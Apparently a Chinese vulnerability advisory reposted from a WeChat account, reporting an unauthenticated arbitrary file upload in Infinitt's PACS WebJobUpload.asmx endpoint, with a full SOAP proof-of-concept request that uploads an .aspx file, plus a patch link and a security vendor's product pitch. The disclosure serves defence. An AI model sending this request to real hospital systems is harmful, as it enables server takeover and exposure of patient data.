英飞达医学影像存档与通信系统任意文件上传漏洞

2024年6月3日11:01:11评论42 views字数 1455阅读4分51秒阅读模式

近日，众智维科技麒麟安全实验室监测到英飞达医学影像存档与通信系统的WebJobUpload接口存在任意文件上传漏洞。英飞达是一家专业开发医学影像系统的公司，成立于1994年，医学影像存档与通信系统 Picture Archiving and Communication System，由软件光盘、使用手册组成，组成模块包括影像采集模块、影像存储模块、影像浏览模块、影像输出模块。用于医疗图像的采集、存储、浏览、传输和输出。其WebJobUpload.asmx接口存在任意文件上传漏洞，未经身份验证的恶意攻击者可以上传任意文件，进而控制服务器系统。

漏洞概述

影响版本

英飞达医学影像存档与通信系统

处置建议

版本修复

目前官方已发布修复版本，建议用户升级到安全版本：

https://www.infinitt.vip/

POC验证

POST /webservices/WebJobUpload.asmx HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Content-Length: 410Accept-Encoding: gzip, deflateContent-Type: text/xml; charset=utf-8Soapaction: "http://rainier/jobUpload"Connection: close<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><jobUpload xmlns="http://rainier"><vcode>1</vcode><subFolder></subFolder><fileName>test.aspx</fileName><bufValue>dGVzdA==</bufValue></jobUpload></soap:Body></soap:Envelope>

红鲸RedOps处置方案

众智维科技深耕医疗行业，旨在为行业客户提供智能化安全应急处置方案，英飞达医学影像存档与通信系统任意文件上传漏洞已经经过研究及设计剧本，实现自动化处置，该剧本可以通过捕获并判断任意文件上传漏洞的目的地址关联的资产是否为英飞达医学影像存档与通信系统，若存在立刻将告警等级修改为严重，通过重新定义等级触发对应的应急动作，调用防火墙接口进行封禁源IP地址同时执行漏洞修复审核工作任务，针对漏洞执行相应的补丁修复操作，考虑客户真实的处置环境会有修复困难等问题，采取对应的抑制措施并将该类型告警关联到目标资产相关的case中去，进行漏洞的延时处理。RedOps作为医疗行业安全运营的神经中枢，使得MTTR响应指标同比之前降低300%以上，将原有超过4小时的处理时间压缩到小时和分钟以内，大幅度减轻客户的应急溯源等运营压力。

原文始发于微信公众号（众智维安）：高危漏洞预警｜英飞达医学影像存档与通信系统任意文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

英飞达医学影像存档与通信系统任意文件上传漏洞

Apache HTTP Server 源代码泄露漏洞CVE-2024-39884

Splunk Splunk Enterprise未授权路径遍历漏洞CVE-2024-36991

Apache Tomcat资源分配控制不当CVE-2024-34750

Apache Tomcat 资源分配控制不当

0day|GeoServer远程代码执行漏洞(CVE-2024-36401)

Geoserver最全历史漏洞详解

HTTP File Server代码执行漏洞(CVE-2024-23692)

【攻防演练】GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401）

[含POC]宏景eHR LoadOtherTreeServlet SQL注入漏洞

Love-Yi情侣网站3.0存在SQL注入漏洞

发表评论

在线咨询

微信